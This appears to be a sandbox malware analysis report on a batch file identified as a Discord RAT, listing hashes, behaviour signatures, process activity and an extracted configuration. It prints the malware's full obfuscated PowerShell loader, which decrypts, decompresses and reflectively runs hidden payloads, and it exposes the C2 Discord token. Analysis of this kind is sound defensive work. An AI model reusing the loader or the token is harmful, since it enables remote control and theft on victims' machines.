Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Client-built.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    38s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/05/2024, 06:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.bat

  • Size

    276KB

  • MD5

    0c82a2b143ba3344234988e76a83fb9e

  • SHA1

    41867630fed3a008020947c217b2d3029f0f7203

  • SHA256

    0bfc1382aa6e0329b1787ba6e1da7c615698c40ebe3acc4c7eaf59393127e7ca

  • SHA512

    491799b57350191479067677d9e98dd6dfb6f4e3755acbf806cbf9f7a5f4109822f03fbe7e216cfb19d8ccab49593b3fd07a06e524f8d75bb7a8e22b9b147e03

  • SSDEEP

    6144:Rf7Ie6igEJsHvviyhG8gbKXFOyPUCWxyRKuwlAvB1PIg:VrgEYvviyKuSxLuwlAv/Ig

Score
10/10
discordratexecutionpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIxMjYwMTc0NTU0OTgxOTkyNA.G6ob17.hVj0y7t0oSi-tGvj_U-QqOqKV-xvE9qC8cf2k4

  • server_id

    1239461504776933396

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Blocklisted process makes network request 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h/pj37mdJYLWvIIq4ccZ4XXl2YrTSq1NSmb5N3irBBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AckqLhjbBU92JLFFeiEdeA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XVapQ=New-Object System.IO.MemoryStream(,$param_var); $JKJeN=New-Object System.IO.MemoryStream; $Uldzf=New-Object System.IO.Compression.GZipStream($XVapQ, [IO.Compression.CompressionMode]::Decompress); $Uldzf.CopyTo($JKJeN); $Uldzf.Dispose(); $XVapQ.Dispose(); $JKJeN.Dispose(); $JKJeN.ToArray();}function execute_function($param_var,$param2_var){ $NLrpg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $keuMG=$NLrpg.EntryPoint; $keuMG.Invoke($null, $param2_var);}$cADeX = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $cADeX;$FbVEn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cADeX).Split([Environment]::NewLine);foreach ($HkIRx in $FbVEn) { if ($HkIRx.StartsWith(':: ')) { $sSiRv=$HkIRx.Substring(3); break; }}$payloads_var=[string[]]$sSiRv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4840
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x150 0x2c8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1652
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1000 /prefetch:8
      1⤵
        PID:4704

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moxft5z3.xg1.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/4840-0-0x00007FF94B1B3000-0x00007FF94B1B5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4840-10-0x0000018FE3EA0000-0x0000018FE3EC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4840-11-0x00007FF94B1B0000-0x00007FF94BC71000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4840-12-0x00007FF94B1B0000-0x00007FF94BC71000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4840-13-0x0000018FE1DD0000-0x0000018FE1DD8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4840-14-0x0000018FE40D0000-0x0000018FE4106000-memory.dmp

        Filesize

        216KB

        Download

      • memory/4840-15-0x0000018FE3E80000-0x0000018FE3E98000-memory.dmp

        Filesize

        96KB

        Download

      • memory/4840-16-0x0000018FE43D0000-0x0000018FE4592000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/4840-17-0x0000018FE4AD0000-0x0000018FE4FF8000-memory.dmp

        Filesize

        5.2MB

        Download

      • memory/4840-20-0x00007FF94B1B0000-0x00007FF94BC71000-memory.dmp

        Filesize

        10.8MB

        Download